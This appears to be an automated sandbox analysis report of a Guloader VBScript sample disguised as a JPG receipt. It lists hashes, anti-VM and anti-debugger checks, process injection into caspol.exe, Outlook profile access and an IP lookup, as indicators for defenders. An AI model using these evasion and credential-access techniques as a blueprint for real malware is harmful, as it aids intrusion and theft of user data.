Analysis
-
max time kernel
58s
-
max time network
154s
-
platform
windows7_x64
-
resource
win7-20221111-en
-
resource tags
arch:x64 arch:x86 image:win7-20221111-en locale:en-us os:windows7-x64 system
-
submitted
02-02-2023 11:29
Static task
static1
Behavioral task
behavioral1
Sample
reciept_ 0014010303102_JPG.vbs
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
reciept_ 0014010303102_JPG.vbs
Resource
win10v2004-20221111-en
General
-
Target
reciept_ 0014010303102_JPG.vbs
-
Size
411KB
-
MD5
d26b9137f31c1c7296ea710bd71b3a59
-
SHA1
b37fcfde9230d8854a8bedb13203beffeb71df21
-
SHA256
33146615b36e5718c7e8e69269f3c5cdf3ec72b525e24550da62b360f1360d30
-
SHA512
ae88914f39a5b695003d77fe1d1bc06b3302f3956ed597125ab0f81f998b35019ec49320de833ed4201cccb98651a3e97ed142d38a84d3a4ebb1706bd8ab9ad6
-
SSDEEP
6144:JCj1ltFlJ1KxZheePFmYAcM2qQLIcK6wa31LBygR9T8nMs85HaUb4bWPJxxRBtps:Uj7tHP+3zzqVcK6egj4MJ5HaUbhv3ps
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
caspol.exe, powershell.exe
description | ioc | process
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | caspol.exe
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | powershell.exe
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
caspol.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | caspol.exe
Key opened | \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | caspol.exe
Key opened | \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | caspol.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
6 | api.ipify.org
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
caspol.exe
pid | process
528 | caspol.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exe, caspol.exe
pid | process
1412 | powershell.exe
528 | caspol.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exe
description | pid | process | target process
PID 1412 set thread context of 528 | 1412 | powershell.exe | caspol.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exe, powershell.exe, powershell.exe
pid | process
1308 | powershell.exe
904 | powershell.exe
1412 | powershell.exe
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exe
pid | process
1412 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exe, powershell.exe, powershell.exe, caspol.exe
description | pid | process
Token: SeDebugPrivilege | 1308 | powershell.exe
Token: SeDebugPrivilege | 904 | powershell.exe
Token: SeDebugPrivilege | 1412 | powershell.exe
Token: SeDebugPrivilege | 528 | caspol.exe
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.exe, powershell.exe, powershell.exe, powershell.exe
description | pid | process | target process
PID 1728 wrote to memory of 1308 | 1728 | WScript.exe | powershell.exe
PID 1728 wrote to memory of 1308 | 1728 | WScript.exe | powershell.exe
PID 1728 wrote to memory of 1308 | 1728 | WScript.exe | powershell.exe
PID 1308 wrote to memory of 904 | 1308 | powershell.exe | powershell.exe
PID 1308 wrote to memory of 904 | 1308 | powershell.exe | powershell.exe
PID 1308 wrote to memory of 904 | 1308 | powershell.exe | powershell.exe
PID 1308 wrote to memory of 904 | 1308 | powershell.exe | powershell.exe
PID 904 wrote to memory of 1412 | 904 | powershell.exe | powershell.exe
PID 904 wrote to memory of 1412 | 904 | powershell.exe | powershell.exe
PID 904 wrote to memory of 1412 | 904 | powershell.exe | powershell.exe
PID 904 wrote to memory of 1412 | 904 | powershell.exe | powershell.exe
PID 1412 wrote to memory of 528 | 1412 | powershell.exe | caspol.exe
PID 1412 wrote to memory of 528 | 1412 | powershell.exe | caspol.exe
PID 1412 wrote to memory of 528 | 1412 | powershell.exe | caspol.exe
PID 1412 wrote to memory of 528 | 1412 | powershell.exe | caspol.exe
PID 1412 wrote to memory of 528 | 1412 | powershell.exe | caspol.exe
-
outlook_office_path 1 IoCs
Processes:
caspol.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | caspol.exe
-
outlook_win_path 1 IoCs
Processes:
caspol.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | caspol.exe
Processes
-
C:\Windows\System32\WScript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\reciept_ 0014010303102_JPG.vbs" 1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile 3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe" 5⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB
MD5
502fd0dd8738615a14d50ddebdb678b7
SHA1
9c98797055a06f0f7018c0431089f82afc3aac85
SHA256
08973b258288784201810c28c420160acf591429ac8c9cf9d879c5eafb19105d
SHA512
0ba5051ee4f12d72a23926bcc6eb9999f309d0b27d353c21c2c67d5a07132c42ce5be0e53e835774c7c88dba70e1b8908dff9b384665c6d9385347602a6308ff